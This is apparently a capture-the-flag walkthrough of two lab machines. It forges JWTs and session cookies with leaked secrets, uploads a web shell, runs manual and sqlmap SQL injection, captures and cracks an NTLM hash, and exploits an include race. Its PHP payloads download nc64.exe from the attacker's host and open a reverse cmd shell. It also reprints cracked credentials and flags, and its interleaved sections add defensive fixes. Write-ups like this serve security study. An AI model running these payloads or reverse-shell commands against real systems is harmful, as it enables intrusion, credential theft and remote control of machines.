        $ret = "Insufficient privileges. Contact admin or developer to upload code. Note: If you recently registered, please wait for one of our admins to approve it.";
    }

    echo $ret;
}
  • /portal/php/files.php
<?php
session_start();
$LOGGED_IN = false;
if($_SESSION['username'] !== "paul"){
    header("Location: ../index.php");
}
if(isset($_SESSION['loggedIn'])){
    $LOGGED_IN = true;
    require '../db/db.php';
}
else{
    header("Location: ../auth/login.php");
    die();
}
?>

files.php also exposes an upload form.
The attack chain, then:

  • upload through fileController.php
  • which requires paul's identity
  • so forge both the PHPSESSID and the JWT

For the JWT we already have the signing key: it is hard-coded in authController.php.

#!/usr/bin/env python3
# Sign a JWT for paul with the secret leaked from authController.php.
import jwt   # pip install pyjwt

SECRET = "6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e"
token = jwt.encode({"data": {"username": "paul"}}, SECRET, algorithm="HS256",
                   headers={"typ": "JWT", "alg": "HS256"})
if isinstance(token, bytes):      # PyJWT < 2 returns bytes, >= 2 returns str
    token = token.decode("ascii")
print(token)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.4mJguG8tRd2z_feWJpmr_J3AdMeDPvW7GCK7cW7o0AI

For the PHPSESSID: makesession() seeds the key with one random character of the username, so for paul there are only four candidates. (The \/ shown in cookie.php above is JSON slash-escaping from the LFI output; the literal in the file is (!528./9890.)

<?php
// enumerate every seed rand(0, 3) can pick for the username "paul"
$num = array(0, 1, 2, 3);
$username = "paul";
foreach($num as $a)
{
    $key = "s4lTy_stR1nG_".$username[$a]."(!528./9890";
    $session_cookie = $username.md5($key);
    echo $session_cookie."\n";
}
?>
paula2a6a014d3bee04d7df8d5837d62e8c5
paul61ff9d4aaefe6bdf45681678ba89ff9d
paul8c8808867b53c49777fe5559164708c3
paul47200b180ccd6835d25d034eeb6e6390
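As an added example (not from the write-up), the Python below forges both halves of paul's identity with the standard library only: the HS256 token is built by hand from the secret leaked in authController.php (same header, payload and key as the PyJWT snippet above, hence the same token), and the PHPSESSID candidates reproduce makesession() for every seed rand() could pick, which gives the same four values as the PHP loop above. It assumes, as that loop does, that the \/ in the cookie.php listing is JSON slash-escaping and the real literal is (!528./9890. A verifier is included to show the check fileController.php performs; it accepts HS256 only, so there is no alg=none shortcut here.

```python
#!/usr/bin/env python3
"""Forge paul's JWT and enumerate his PHPSESSID candidates (added example,
standard library only)."""
import base64
import hashlib
import hmac
import json
from typing import List, Optional

# Secret hard-coded in authController.php / fileController.php above.
SECRET = "6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e"
# Key template from cookie.php; "\/" in the LFI output is JSON escaping of "/".
KEY_PREFIX = "s4lTy_stR1nG_"
KEY_SUFFIX = "(!528./9890"


def b64url(raw: bytes) -> str:
    """JWT base64url: URL-safe alphabet, no padding."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def forge_jwt(username: str, secret: str = SECRET) -> str:
    """HS256 token with the header/payload layout PyJWT produced above."""
    header = b64url(b'{"alg":"HS256","typ":"JWT"}')
    payload = b64url(json.dumps({"data": {"username": username}},
                                separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode("ascii")
    signature = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(signature)}"


def verify_jwt(token: str, secret: str = SECRET) -> Optional[dict]:
    """What JWT::decode($jwt, $key, ['HS256']) checks; payload on success, else None."""
    try:
        header, payload, signature = token.split(".")
    except ValueError:
        return None
    expected = hmac.new(secret.encode(), f"{header}.{payload}".encode("ascii"),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(b64url(expected), signature):
        return None
    padded = payload + "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def session_candidates(username: str) -> List[str]:
    """makesession() uses username[rand(0, len-1)]; try every position once."""
    seen = {}
    for ch in username:
        key = KEY_PREFIX + ch + KEY_SUFFIX
        seen[username + hashlib.md5(key.encode()).hexdigest()] = None
    return list(seen)


if __name__ == "__main__":
    token = forge_jwt("paul")
    print("token=" + token)
    for candidate in session_candidates("paul"):
        print("PHPSESSID=" + candidate)
```

Only one of the four PHPSESSID values corresponds to a session that actually exists on the server, so each candidate is tried together with the forged token until fileController.php stops answering "Insufficient privileges".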

The final cookie header is:

Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.4mJguG8tRd2z_feWJpmr_J3AdMeDPvW7GCK7cW7o0AI; PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390

The form uploads a ZIP; change the file name (the task field decides the name on disk) and the file content to a PHP web shell, and the upload lands in /portal/uploads/ as executable code.

Privilege escalation

type C:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData\juliette.json
{
"pizza" : "margherita",
"size" : "large",
"drink" : "water",
"card" : "VISA",
"PIN" : "9890",
"alternate" : {
"username" : "juliette",
"password" : "jUli901./())!",
}
}

Log in over SSH with juliette:jUli901./())!

type C:\Users\juliette\Desktop\user.txt
c5d9d568c5fc21e0dc0c5819d16aad9f

type C:\Users\juliette\Desktop\todo.html
<html>
<style>
html{
background:black;
color:orange;
}
table,th,td{
border:1px solid orange;
padding:1em;
border-collapse:collapse;
}
</style>
<table>
<tr>
<th>Task</th>
<th>Status</th>
<th>Reason</th>
</tr>
<tr>
<td>Configure firewall for port 22 and 445</td>
<td>Not started</td>
<td>Unauthorized access might be possible</td>
</tr>
<tr>
<td>Migrate passwords from the Microsoft Store Sticky Notes application to our new password manager</td>
<td>In progress</td>
<td>It stores passwords in plain text</td>
</tr>
<tr>
<td>Add new features to password manager</td>
<td>Not started</td>
<td>To get promoted, hopefully lol</td>
</tr>
</table>

</html>

Look for the password store (the Sticky Notes database mentioned in the to-do list):

dir C:\Users\juliette\Documents

11/29/2020 04:10 AM 4,096 plum.sqlite
01/15/2021 05:10 PM 32,768 plum.sqlite-shm
01/15/2021 05:10 PM 329,632 plum.sqlite-wal

Copy the files to the local machine and open them with sqlite3. Copy the -wal and -shm files along with plum.sqlite: recent notes live in the write-ahead log until it is checkpointed, and the .sqlite file alone may not contain them.

sqlite3 plum.sqlite 
sqlite> .tables
Media Stroke SyncState User
Note StrokeMetadata UpgradedNote
sqlite> select * from Note;
\id=48c70e58-fcf9-475a-aea4-24ce19a9f9ec juliette: jUli901./())!
\id=fc0d8d70-055d-4870-a5de-d76943a68ea2 development: fN3)sN5Ee@g
\id=48924119-7212-4b01-9e0f-ae6d678d49b2 administrator: [MOVED]|ManagedPosition=|1|0||Yellow|0|||||||0c32c3d8-7c60-48ae-939e-798df198cfe7|8e814e57-9d28-4288-961c-31c806338c5b|637423162765765332||637423163995607122

This gives development:fN3)sN5Ee@g.
Log in over SSH as that user.

dir c:\Development

11/29/2020 04:11 AM 18,312 Krypter_Linux

Decompile it in IDA:

int __cdecl main(int argc, const char **argv, const char **envp)
{
size_t v3; // rbx
__int64 v4; // rax
char v6[44]; // [rsp+10h] [rbp-50h] BYREF
int v7; // [rsp+3Ch] [rbp-24h]
__int64 v8; // [rsp+40h] [rbp-20h]
int i; // [rsp+48h] [rbp-18h]
int v10; // [rsp+4Ch] [rbp-14h]

std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(v6, argv, envp);
v8 = curl_easy_init();
puts(
"Krypter V1.2\n"
"\n"
"New project by Juliette.\n"
"New features added weekly!\n"
"What to expect next update:\n"
"\t- Windows version with GUI support\n"
"\t- Get password from cloud and AUTOMATICALLY decrypt!\n"
"***\n");
if ( argc == 2 )
{
v10 = 0;
for ( i = 0; ; ++i )
{
v3 = i;
if ( v3 >= strlen(argv[1]) )
break;
v10 += argv[1][i];
}
if ( v10 == 1601 )
{
if ( v8 )
{
puts("Requesting decryption key from cloud...\nAccount: Administrator");
curl_easy_setopt(v8, 10002LL, (__int64)"http://passmanager.htb:1234/index.php");
curl_easy_setopt(v8, 10015LL, (__int64)"method=select&username=administrator&table=passwords");
curl_easy_setopt(v8, 20011LL, (__int64)WriteCallback);
curl_easy_setopt(v8, 10001LL, (__int64)v6);
v7 = curl_easy_perform(v8);
curl_easy_cleanup(v8);
puts("Server response:\n\n");
v4 = std::operator<<<char>(&std::cout, v6);
std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
}
}
else
{
puts("Incorrect master key");
}
}
else
{
puts("No key supplied.\nUSAGE:\n\nKrypter <key>");
}
std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(v6);
return 0;
}
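As an added example (not from the write-up), the Python below reproduces the master-key check from the decompiled main() above: the loop sums the bytes of argv[1] and compares the total with 1601, so any string with that byte sum is a valid "master key" and nothing is ever compared against a stored secret. The forge_key helper is my own addition for producing such a string from printable characters; the binary contains nothing of the sort.

```python
#!/usr/bin/env python3
"""Reproduce the Krypter master-key check from the decompiled main() above
(added example; forge_key is my helper, not something in the binary)."""

TARGET_SUM = 1601  # the constant v10 is compared with


def key_sum(key: str) -> int:
    """v10 += argv[1][i] over every byte. ASCII keys are all positive, so the
    signed-char detail of the C loop does not matter here."""
    return sum(key.encode("latin-1"))


def is_master_key(key: str) -> bool:
    """The entire authentication decision the binary makes."""
    return key_sum(key) == TARGET_SUM


def forge_key(target: int = TARGET_SUM, filler: str = "A") -> str:
    """Produce a printable string whose byte sum is exactly `target`: repeat
    `filler`, then finish with one character carrying the remainder, giving
    back fillers until that last character is printable ASCII (0x20..0x7e)."""
    if len(filler) != 1 or not (0x20 <= ord(filler) <= 0x7e):
        raise ValueError("filler must be one printable ASCII character")
    weight = ord(filler)
    count, rest = divmod(target, weight)
    while rest < 0x20 or rest > 0x7e:
        count -= 1
        rest += weight
        if count < 0 or rest > 0x7e:
            raise ValueError(f"no printable key with byte sum {target} and filler {filler!r}")
    return filler * count + chr(rest)


if __name__ == "__main__":
    key = forge_key()
    print(repr(key), key_sum(key), is_master_key(key))   # 24 x 'A' plus ')'
```

A checksum of the input is not a credential: the check leaks nothing about the intended key, and the whole space of accepted keys is enumerable by construction. The real control on this box is that the password service only listens on 127.0.0.1:1234, which is why the write-up queries it from the box itself.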
netstat -ant

TCP 127.0.0.1:1234 0.0.0.0:0 LISTENING InHost

Port 1234 only listens on localhost, so request the URL from the program directly on the box:

curl "http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords"

selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}

This gives the AES key.

Try SQL injection on the username parameter:

curl "http://127.0.0.1:1234/index.php?method=select&username='+or+1%23&table=passwords"
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}
  • Manual injection
curl "http://127.0.0.1:1234/index.php?method=select&username='+or+1%23&table=passwords"
curl "http://127.0.0.1:1234/index.php?method=select&username='+union+select+1%23&table=passwords"
curl "http://127.0.0.1:1234/index.php?method=select&username='+union+select+database()%23&table=passwords"
curl "http://127.0.0.1:1234/index.php?method=select&username='+union+select+group_concat(table_name)+from+information_schema.tables+where+table_schema='bread'%23&table=passwords"
curl "http://127.0.0.1:1234/index.php?method=select&username='+union+select+group_concat(column_name)+from+information_schema.columns+where+table_name='passwords'%23&table=passwords"
curl "http://127.0.0.1:1234/index.php?method=select&username='+union+select+group_concat(password)+from+bread.passwords%23&table=passwords"

This gives H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw= (the administrator's encrypted password).

  • Or forward the port over SSH and run sqlmap
ssh -f -N -L 1234:127.0.0.1:1234 development@10.10.10.228
sqlmap -u "http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords"

I did not bother writing up the sqlmap steps.

Decryption

#!/usr/bin/env python3
# Decrypt the blob dumped from bread.passwords with the key returned by the
# local passmanager service: AES-128-CBC with an all-zero IV (so the first block
# decrypts exactly as ECB would). The trailing bytes of the output are padding.
import base64
from Crypto.Cipher import AES   # pip install pycryptodome

KEY = b"k19D193j.<19391("       # 16 bytes -> AES-128, from the aes_key column
IV = bytes(16)                  # all-zero IV
cipher = base64.b64decode("H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=")
plain = AES.new(KEY, AES.MODE_CBC, IV).decrypt(cipher)
print(plain)

This gives administrator:p@ssw0rd!@#$9890./
Log in over SSH.

type c:\Users\Administrator\Desktop\root.txt
c04f72045d76a74c63a602f199a79ecd

Quite a well-rounded box.


Proper

Port scanning

nmap -sV -sT -Pn 10.10.10.231

Nmap scan report for 10.10.10.231
Host is up (0.081s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Directory scanning

---- Scanning URL: http://10.10.10.231/ ----
==> DIRECTORY: http://10.10.10.231/assets/
==> DIRECTORY: http://10.10.10.231/licenses/

Exploitation

The home page source contains:

<script type="text/javascript">
$(document).ready(function(){
'use strict';
jQuery('#headerwrap').backstretch([ "assets/img/bg/bg1.jpg", "assets/img/bg/bg3.jpg" ], {duration: 8000, fade: 500});
$( "#product-content" ).load("/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b",function() {});
});
</script>
curl http://10.10.10.231/products-ajax.php
<?php
// [8] Undefined index: order On line 6 in file C:\inetpub\wwwroot\products-ajax.php
define('SECURE_PARAM_SALT','hie0shah6ooNoim');
include('functions.php');
include('db-config.php');
if ( !$_GET['order'] || !$_GET['h'] ) {
// Set the response code to 500
http_response_code(500);
// and die(). Someone fiddled with the parameters.
die('Parameter missing or malformed.');
}
?>

Testing shows the check is:
h = md5(SECURE_PARAM_SALT + order)
The salt is leaked in the source above, so any order value can be signed, including sqlmap's payloads.

SQLMap tamper

#!/usr/bin/env python3
# sqlmap tamper script: the endpoint only accepts an order value whose h
# parameter equals md5(SECURE_PARAM_SALT + order), so append a matching h to
# every payload. Run sqlmap with --skip-urlencode so the bytes that are hashed
# are the ones the server sees.
import hashlib
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

SALT = b"hie0shah6ooNoim"   # from the leaked products-ajax.php source


def dependencies():
    pass


def tamper(payload, **kwargs):
    if not payload:
        return payload
    h = hashlib.md5(SALT + payload.encode()).hexdigest()
    return "{}&h={}".format(payload, h)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py --dbs --batch --skip-urlencode
available databases [3]:
[*] cleaner
[*] information_schema
[*] test

sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py -D cleaner --tables --batch --skip-urlencode
Database: cleaner
[3 tables]
+-----------+
| customers |
| licenses |
| products |
+-----------+

sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py -D cleaner -T licenses --columns --batch --skip-urlencode
Database: cleaner
Table: licenses
[4 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| customer_id | int(11) |
| id | int(11) |
| license | varchar(50) |
| product_id | int(11) |
+-------------+-------------+

proxychains sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py -D cleaner -T licenses -C customer_id,id,license,product_id --dump --batch --skip-urlencode
Database: cleaner
Table: licenses
[18 entries]
+-------------+----+--------------------------------------+------------+
| customer_id | id | license | product_id |
+-------------+----+--------------------------------------+------------+
| 4 | 1 | 7d4cdf91-119b-414d-b16b-7cb841b2c182 | 4 |
| 17 | 2 | e7b59b20-8c70-48b0-91da-58bf354b18d5 | 8 |
| 17 | 3 | 3ea26f9c-f7c8-428f-a613-f4c66f08d0b9 | 6 |
| 17 | 4 | 372b02bd-8730-4bc6-a6fb-8cf9726f797b | 4 |
| 15 | 5 | 75ab3363-43d4-4e6b-903a-9d36919b36be | 8 |
| 16 | 6 | 139aff78-770c-4c59-9aef-32c4c65e68b3 | 4 |
| 22 | 7 | bdf82583-9f1a-42a3-b892-4b569e77f4c9 | 2 |
| 11 | 8 | d7da6b56-6f8c-4a26-85cc-c80860f3021a | 8 |
| 21 | 9 | 2ca03799-bd0d-4baa-a163-eb2a3b143f22 | 4 |
| 7 | 10 | 0a65e4e4-f1c7-4452-9bf0-02f4d6c35410 | 4 |
| 7 | 11 | 2e14ce43-8e85-43d7-b9ae-ab2c2ff64bf8 | 4 |
| 15 | 12 | 873f8add-2f3c-4da2-9164-649f55c1d329 | 4 |
| 2 | 13 | c63524b6-6346-4a34-b5c3-a3fe46593df1 | 4 |
| 25 | 14 | ad228131-518a-4527-8a1c-46d0723b691d | 2 |
| 1 | 15 | 4fa6a5cd-2081-4222-9b46-6c58df72bcfd | 8 |
| 1 | 16 | 183a7e47-e3cf-46f9-80fa-acb63590cc1c | 2 |
| 9 | 17 | 49dea5ef-3f7f-4790-9b94-b6bf29f5f893 | 2 |
| 4 | 18 | 41e5be3a-20fc-47b2-9dcc-c05def688cdb | 6 |
+-------------+----+--------------------------------------+------------+

sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py -D cleaner -T customers --columns --batch --skip-urlencode
Database: cleaner
Table: customers
[4 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| customer_name | varchar(50) |
| id | int(11) |
| login | varchar(255) |
| password | varchar(255) |
+---------------+--------------+

sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py -D cleaner -T customers -C customer_name,id,login,password --dump --batch --skip-urlencode
Database: cleaner
Table: customers
[11 entries]
+---------------------+----+------------------------------+----------------------------------+
| customer_name | id | login | password |
+---------------------+----+------------------------------+----------------------------------+
| Vikki Solomon | 1 | vikki.solomon@throwaway.mail | 7c6a180b36896a0a8c02787eeafb0e4c |
| Neave Stone | 2 | nstone@trashbin.mail | 6cb75f652a9b52798eb6cf2201057c73 |
| Bertie McEachern | 3 | bmceachern7@discovery.moc | e10adc3949ba59abbe56e057f20f883e |
| Jordana Kleiser | 4 | jkleiser8@google.com.xy | 827ccb0eea8a706c4c34a16891f84e7b |
| Mariellen Chasemore | 5 | mchasemore9@sitemeter.moc | 25f9e794323b453885f5181f1b624d0b |
| Gwyneth Dornin | 6 | gdornina@marriott.moc | 5f4dcc3b5aa765d61d8327deb882cf99 |
| Israel Tootell | 7 | itootellb@forbes.moc | f25a2fc72690b780b2a14e140ef6a9e0 |
| Karon Mangham | 8 | kmanghamc@state.tx.su | 8afa847f50a716e64932d995c8e7435a |
| Janifer Blinde | 9 | jblinded@bing.moc | fcea920f7412b5da7be0cf42b8c93759 |
| Laurens Lenchenko | 10 | llenchenkoe@macromedia.moc | f806fc5a2a0d5ba2471600758452799c |
| Andreana Austin | 11 | aaustinf@booking.moc | 25d55ad283aa400af464c76d713c07ad |
+---------------------+----+------------------------------+----------------------------------+

The MD5 hashes are almost all weak passwords.
Log in with any one of the credentials.

curl http://10.10.10.231/licenses/licenses.php?theme=&h=9094e65be4a9dc27cd4af70674a99c64

<?php
// [2] include(/header.inc): failed to open stream: No such file or directory On line 36 in file C:\inetpub\wwwroot\functions.php
// Following function securely includes a file. Whenever we
// will encounter a PHP tag we will just bail out here.
function secure_include($file) {
if (strpos(file_get_contents($file),'<?') === false) {
include($file); //<<<<< Error encountered in this line.
} else {
http_response_code(403);
die('Forbidden - Tampering attempt detected.');
}
}
?>

Trying RFI

python3 -m http.server 9998

curl http://10.10.10.231/licenses/licenses.php?theme=http://10.10.16.7:9998/&h=c68113684a9e7ddca835d8f0235e2759

[2] include(): http:// wrapper is disabled in the server configuration by allow_url_include=0
On line 36 in file C:\inetpub\wwwroot\functions.php

The http:// wrapper cannot be used.

python3 smbserver.py -ip 10.10.16.7 -smb2support evil .
curl http://10.10.10.231/licenses/licenses.php?theme=//10.10.16.7&h=b1a3d9ecf02d4854f3a730f8b2a9af5d

[*] Incoming connection (10.10.10.231,51174)
[*] AUTHENTICATE_MESSAGE (PROPER\web,PROPER)
[*] User PROPER\web authenticated successfully
[*] web::PROPER:aaaaaaaaaaaaaaaa:956a52cc975ff5da7c40b3a88a2280cd:0101000000000000808cbaf62b60d701fee1b72b5916ee630000000001001000670049005600790046004b0055006a00020010005a004a006b004300690054006a00480003001000670049005600790046004b0055006a00040010005a004a006b004300690054006a00480007000800808cbaf62b60d70106000400020000000800300030000000000000000000000000200000df729e7896fc8038dada23bc657eaeb31358ef464f456b1fa869efec2d18cea10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000
[*] Closing down connection (10.10.10.231,51174)
[*] Remaining connections []

Got the hash

cat hash 
web::PROPER:aaaaaaaaaaaaaaaa:956a52cc975ff5da7c40b3a88a2280cd:0101000000000000808cbaf62b60d701fee1b72b5916ee630000000001001000670049005600790046004b0055006a00020010005a004a006b004300690054006a00480003001000670049005600790046004b0055006a00040010005a004a006b004300690054006a00480007000800808cbaf62b60d70106000400020000000800300030000000000000000000000000200000df729e7896fc8038dada23bc657eaeb31358ef464f456b1fa869efec2d18cea10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000

john --wordlist=/usr/share/wordlists/rockyou.txt hash
charlotte123! (web)

Credentials obtained

web:charlotte123!

Restart the SMB server

python3 smbserver.py -ip 10.10.16.7 -username web -password charlotte123! -smb2support yolo .

if (strpos(file_get_contents($file),'<?') === false) { 
include($file); //<<<<< Error encountered in this line.

Bypass by racing: change the content of the local file between the check and the include.

#!/bin/bash
# Keep rewriting header.inc on the share so its content flips between the
# check (file_get_contents) and the include of the same file.
payload="$1"
while true
do
    echo "$payload" > header.inc
done
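The race above, seen from the defender's side, as an added example that is not code from the page or from the application. `secure_include()` reads the file twice, once for the `<?` check and once for the `include`, so whatever is on the share at the second read is what runs. The simulation below replaces the filesystem with a constructed reader whose content changes per call, shows the check-then-include pattern letting tampered content through, and gives two fixes: use the bytes that were checked, and, better, never pass a user-controlled path to `include` at all. The theme allowlist and the `themes/<name>/header.inc` layout are assumptions for the example.

```python
#!/usr/bin/env python3
"""Check-then-include (TOCTOU) in secure_include() and two fixes."""
import re
from typing import Callable, Iterator, List, Optional

FORBIDDEN = "<?"


def make_racing_source(contents: List[str]) -> Callable[[], str]:
    """Constructed stand-in for a file being rewritten: each read returns the next item."""
    it: Iterator[str] = iter(contents)

    def read() -> str:
        return next(it)

    return read


def include_check_then_read(read: Callable[[], str]) -> Optional[str]:
    """Mirrors secure_include(): one read for the check, a second, independent read for use.
    Returns the content that would be included, or None where the PHP sends 403 and dies."""
    if FORBIDDEN in read():        # file_get_contents($file)
        return None
    return read()                  # include($file) reads the file again


def include_read_once(read: Callable[[], str]) -> Optional[str]:
    """Fix 1: read once and use exactly the bytes that were checked."""
    content = read()
    if FORBIDDEN in content:
        return None
    return content


# Fix 2: do not hand a user-controlled path to include(); allowlist a bare name instead.
THEME_NAME = re.compile(r"[a-z0-9_-]{1,32}")


def is_valid_theme_name(theme: str) -> bool:
    """A bare theme name: no path separators, no URL scheme, no UNC prefix, no traversal."""
    return THEME_NAME.fullmatch(theme) is not None


def resolve_theme(theme: str, base: str = "themes") -> Optional[str]:
    """Map an allowlisted theme name onto a fixed local layout; anything else is refused."""
    if not is_valid_theme_name(theme):
        return None
    return f"{base}/{theme}/header.inc"
```

Fix 2 is the one that matters here: `allow_url_include=0` blocks the `http://` wrapper, as the page's error shows, but on Windows a `//host/share` UNC path is an ordinary filesystem path and is never subject to that setting, which is exactly how the SMB include got through. Refusing anything that is not a bare name closes both.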

GetShell

<?php echo "hacked";system("cmd /c powershell iwr http://10.10.16.7:9995/nc64.exe -outf \windows\system32\spool\drivers\color\yolo.exe"); ?>

<?php echo "hacked";system("cmd /c start \windows\system32\spool\drivers\color\yolo.exe -e cmd 10.10.16.7 9990"); ?>

#!/usr/bin/env python3
# Hammer the include from several threads so one request lands while
# header.inc on the share holds the swapped-in content.
import requests
import threading

def thd():
    for _ in range(100):
        req = requests.session()
        # log in as one of the customers whose MD5 was cracked above
        login_url = "http://10.10.10.231/licenses/index.php"
        username = "vikki.solomon@throwaway.mail"
        password = "password1"
        data = {"username": username, "password": password}
        req.post(url=login_url, data=data)
        index_url = "http://10.10.10.231/licenses/licenses.php"
        req.get(url=index_url)
        payload_url = "http://10.10.10.231/licenses/licenses.php?theme=//10.10.16.7/yolo&h=05e45a8f5f58f601063e937929048fd7"
        res = req.get(url=payload_url)
        if "hacked" in res.text:
            print(res.text)
        logout_url = "http://10.10.10.231/licenses/logout.php"
        req.get(url=logout_url)

pool = []
for i in range(0, 5):
    single_thd = threading.Thread(target=thd)
    pool.append(single_thd)
for n in pool:
    n.start()

cmd /c powershell iwr http://10.10.16.7:9995/nc64.exe -outf \windows\system32\spool\drivers\color\nc64.exe

Doesn't work.

cmd /c powershell iwr http://10.10.16.7:9995/nc64.exe -outf \windows\system32\spool\drivers\color\yolo.exe


Not sure what strange bug got triggered; simply changing the file name made the write succeed.
The home directory is writable anyway, so going through a world-writable directory was unnecessary.

type c:\users\web\desktop\user.txt
540dbda93520798e554345539fe38988

Privilege escalation

dir \"Program Files"\cleanup

11/15/2020 05:03 AM 2,999,808 client.exe
11/15/2020 10:22 AM 174 README.md
11/15/2020 06:20 AM 3,041,792 server.exe

FTP inexplicably doesn't work.

File transfer has to take a roundabout route.

Apache2 allows PUT but the file can't be uploaded directly.

The file is still transmitted over the network, though,

so capture the traffic and reconstruct the file from it.

Couldn't finish the reverse engineering; had to read the writeup on Raid.

First create a junction

mklink /j \users\web\downloads\yoloyolo \users\administrator\desktop

Drive the named pipe \\.\pipe\cleanuppipe

echo CLEAN \users\web\downloads\yoloyolo\root.txtx > \\.\pipe\cleanuppipe

At this point server.exe performs the operation named in the pipe message: the target is encrypted and moved to \programdata\cleanup (this program is presumably running as administrator).

Delete the junction, create a folder in its place, then restore the file.

rmdir \users\web\downloads\yoloyolo
mkdir \users\web\downloads\yoloyolo
echo RESTORE \users\web\downloads\yoloyolo\root.txtx > \\.\pipe\cleanuppipe
type \users\web\downloads\yoloyolo\root.txt

f2167014736b2934e9721962b525f674
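The junction plus named-pipe sequence above is a privileged service trusting a client-supplied path: `CLEAN`/`RESTORE` are executed with the service's own rights, and a junction in the web user's profile redirects them into the administrator's desktop. As an added example (not the cleanup service's code), here is the validation such a service should perform on every path it receives: refuse any path with a link or reparse point in it, and refuse any path that canonicalises outside the requesting user's own profile. The directory layout is constructed to mirror the page, and symlinks stand in for Windows junctions so the example runs on Linux.

```python
#!/usr/bin/env python3
"""Path validation for a privileged service acting on client-supplied paths."""
import os
import tempfile
from typing import Optional


def has_link_component(path: str) -> bool:
    """True if any component of `path`, including the last one, is a symlink (or junction)."""
    normalized = os.path.normpath(path)
    current = os.sep if os.path.isabs(normalized) else ""
    for part in normalized.split(os.sep):
        if not part:
            continue
        current = os.path.join(current, part)
        if os.path.islink(current):
            return True
    return False


def validate_client_path(requested: str, client_root: str) -> Optional[str]:
    """Return the canonical path if the service may act on it for this client, else None."""
    root = os.path.realpath(client_root)
    if has_link_component(requested):
        return None                      # mklink /j ... would land here
    real = os.path.realpath(requested)   # resolves what exists; a missing leaf is kept as-is
    if os.path.commonpath([root, real]) != root:
        return None                      # ..\ traversal out of the client's profile
    return real


def demo() -> dict:
    """Constructed layout: web user's profile, admin desktop, and a junction between them."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = os.path.realpath(tmp)      # keep platform tmp symlinks out of the picture
        web = os.path.join(tmp, "users", "web")
        admin_desktop = os.path.join(tmp, "users", "administrator", "desktop")
        os.makedirs(os.path.join(web, "downloads"))
        os.makedirs(admin_desktop)
        with open(os.path.join(admin_desktop, "root.txt"), "w") as f:
            f.write("constructed-flag\n")

        # Equivalent of: mklink /j \users\web\downloads\yoloyolo \users\administrator\desktop
        junction = os.path.join(web, "downloads", "yoloyolo")
        os.symlink(admin_desktop, junction)
        via_junction = validate_client_path(os.path.join(junction, "root.txt"), web)

        # A real directory inside the client's own profile is fine.
        plain_dir = os.path.join(web, "downloads", "plain")
        os.mkdir(plain_dir)
        own_file = validate_client_path(os.path.join(plain_dir, "notes.txt"), web)

        # Lexical traversal without any link is caught by the canonical-path check.
        traversal = validate_client_path(
            os.path.join(web, "..", "administrator", "desktop", "root.txt"), web)

        return {
            "junction_rejected": via_junction is None,
            "own_file_allowed": own_file is not None,
            "traversal_rejected": traversal is None,
        }


if __name__ == "__main__":
    print(demo())
```

Validation followed by a separate open is itself a check-then-use window, so on Windows the service should additionally impersonate the pipe client (`ImpersonateNamedPipeClient`) before touching the file, so that the operating system's access check runs with the client's token rather than the service's, and open with `FILE_FLAG_OPEN_REPARSE_POINT` where it must not follow junctions.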

The tricks on this machine are wild.

What a machine.


EOF